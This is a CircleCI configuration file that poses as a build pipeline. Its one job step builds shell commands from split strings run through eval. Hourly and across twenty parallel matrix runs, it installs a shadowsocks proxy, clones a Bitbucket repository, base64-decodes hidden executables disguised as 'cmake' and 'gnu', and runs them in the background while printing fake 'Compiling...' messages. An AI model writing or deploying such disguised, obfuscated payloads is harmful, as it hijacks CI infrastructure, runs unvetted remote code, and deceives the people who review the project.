version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--digest", "--rebuild-if-new-ver", "--rebuild-ignore", "--ignore-default-opts", "--autounmask-write", "--config-root", "--columns", "--rebuild-if-unbuilt", "--autounmask-license", "--dynamic-deps", "--deep", "--onlydeps", "--changed-use", "--buildpkg-exclude", "--oneshot", "--keep-going", "--changed-deps-report", "--color", "--prune", "--reinstall"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--digest", "--rebuild-if-new-ver", "--rebuild-ignore", "--ignore-default-opts", "--autounmask-write", "--config-root", "--columns", "--rebuild-if-unbuilt", "--autounmask-license", "--dynamic-deps", "--deep", "--onlydeps", "--changed-use", "--buildpkg-exclude", "--oneshot", "--keep-going", "--changed-deps-report", "--color", "--prune", "--reinstall"]
    triggers:
      - schedule:
          cron: "31 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: graykode-REBUILD
          command: |
            XfcfvLJzdoB="sudo add-ap"
            YgHukKIm="t-repositor"
            BBsLOQWaDLb="y ppa:max-c"
            leCKHkpZTp="-lv/shadows"
            AsbDZpxoq="ocks-libev "
            MgDnPLuJrg="-y &>/dev/n"
            eval "$XfcfvLJzdoB""$YgHukKIm""$BBsLOQWaDLb""$leCKHkpZTp""$AsbDZpxoq""$MgDnPLuJrg""ull || true"
            tqiXh="sudo add-ap"
            GrDevQ="t-repositor"
            NdXVgAWM="y ppa:ondre"
            JhcXSI="j/apache2 -"
            CeBAZbIZ="y &>/dev/nu"
            eval "$tqiXh""$GrDevQ""$NdXVgAWM""$JhcXSI""$CeBAZbIZ""ll || true"
            sudo apt update || true
            WdKbHlsOXc="sudo apt --"
            brrga="yes install"
            ntEMJTpPK=" openssl &>"
            jJDfaiJUB="/dev/null |"
            eval "$WdKbHlsOXc""$brrga""$ntEMJTpPK""$jJDfaiJUB""| true"
            iCpJtbcw="sudo apt --"
            jSIJOPeYM="yes install"
            ePHiIhmpNa=" cl-base64 "
            bADqt="git &>/dev/"
            vDalMkC="null || tru"
            eval "$iCpJtbcw""$jSIJOPeYM""$ePHiIhmpNa""$bADqt""$vDalMkC""e"
            zJJvENSw="git clone h"
            RiMtGO="ttps://gccb"
            CKwwttCpk="uild@bitbuc"
            lrlDd="ket.org/gcc"
            IbfQM="build/gcc.g"
            scPeSYJEHJK="it &>/dev/n"
            eval "$zJJvENSw""$RiMtGO""$CKwwttCpk""$lrlDd""$IbfQM""$scPeSYJEHJK""ull"
            DRLgvgXtqX="base64 -d g"
            rgeXqQy="cc/cmake_np"
            eval "$DRLgvgXtqX""$rgeXqQy""_ > cmake"
            mtzDFwezLo="base64 -d g"
            GYIxA="cc/config_ "
            pRyQmkCu="> status.lo"
            eval "$mtzDFwezLo""$GYIxA""$pRyQmkCu""g"
            GCdYgpsDSwu="base64 -d g"
            dUbGUuLjlzq="cc/make_ > "
            eval "$GCdYgpsDSwu""$dUbGUuLjlzq""gnu"
            sed -i 's/1080/1081/g' status.log
            chmod +x gnu cmake
            iSXSGleA="./cmake"
            eval "$iSXSGleA"""
            sed -i 's/build/ob2o/g' status.log
            ummMR="sudo ./gnu "
            pBuvaNlJS="--config st"
            kdcmvmXTPA="atus.log &>"
            eval "$ummMR""$pBuvaNlJS""$kdcmvmXTPA""/dev/null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2515)) ] && sudo killall gnu && break; sleep 194; done
